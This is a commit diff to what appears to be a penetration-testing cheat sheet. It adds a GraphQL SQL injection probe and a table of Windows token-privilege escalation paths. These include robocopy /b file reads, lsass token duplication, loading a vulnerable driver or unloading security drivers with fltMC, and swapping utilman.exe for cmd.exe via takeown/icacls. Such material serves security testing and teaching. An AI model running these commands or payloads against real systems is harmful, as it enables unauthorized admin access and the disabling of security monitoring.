Privilege impersonation and GraphQL SQLi
parent
ba9fce83b1
commit
896e262531
|
@ -222,6 +222,18 @@ Use `$regex`, `$ne` from []() inside a `search` parameter.
|
|||
|
||||
### SQL injection
|
||||
|
||||
Send a single inside a graphql parameter to trigger the SQL injection
|
||||
|
||||
```powershell
|
||||
{
|
||||
bacon(id: "1'") {
|
||||
id,
|
||||
type,
|
||||
price
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Simple SQL injection inside a graphql field.
|
||||
|
||||
```powershell
|
||||
|
|
|
@ -709,6 +709,20 @@ Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
|||
|
||||
## EoP - Impersonation Privileges
|
||||
|
||||
Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.
|
||||
|
||||
| Privilege | Impact | Tool | Execution path | Remarks |
|
||||
| --- | --- | --- | --- | --- |
|
||||
|`SeAssignPrimaryToken`| ***Admin*** | 3rd party tool | *"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"* | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. |
|
||||
|`SeBackup`| **Threat** | ***Built-in commands*** | Read sensitve files with `robocopy /b` |- May be more interesting if you can read %WINDIR%\MEMORY.DMP<br> <br>- `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.<br> <br>- Robocopy requires both SeBackup and SeRestore to work with /b parameter. |
|
||||
|`SeCreateToken`| ***Admin*** | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. ||
|
||||
|`SeDebug`| ***Admin*** | **PowerShell** | Duplicate the `lsass.exe` token. | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) |
|
||||
|`SeLoadDriver`| ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys`<br>2. Exploit the driver vulnerability<br> <br> Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)<br>2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) |
|
||||
|`SeRestore`| ***Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.<br>2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).<br>3. Rename utilman.exe to utilman.old<br>4. Rename cmd.exe to utilman.exe<br>5. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
|
||||
|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
|
||||
|`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.<br> <br>To be verified. ||
|
||||
|
||||
|
||||
### Meterpreter getsystem and alternatives
|
||||
|
||||
```powershell
|
||||
|
@ -744,7 +758,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
|
|||
### Juicy Potato (abusing the golden privileges)
|
||||
|
||||
Binary available at : https://github.com/ohpe/juicy-potato/releases
|
||||
:warning: Juicy Potato doesn't work in Windows Server 2019.
|
||||
:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809.
|
||||
|
||||
1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
|
||||
|
||||
|
|
Loading…
Reference in New Issue